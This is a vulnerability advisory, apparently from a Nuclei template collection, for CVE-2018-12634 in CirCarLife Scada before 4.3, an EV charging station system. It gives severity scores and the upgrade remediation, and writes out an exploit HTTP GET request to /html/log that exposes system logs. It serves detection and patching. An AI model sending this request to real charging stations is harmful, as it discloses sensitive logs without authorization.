| Title | CirCarLife Scada <4.3 - System Log Exposure |
|---|---|
| Author | geeknik |
| Severity | Critical |
| Impact | An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure. |
| Remediation | Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.92847 |
| CVE ID | CVE-2018-12634 |
| CWE ID | CWE-200 |
| Tags | cve cve2018 scada circontrol circarlife logs edb vuln |
CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.
GET /html/log HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0.4 (x64 de)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12634.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-12634.pcap
N/AN/A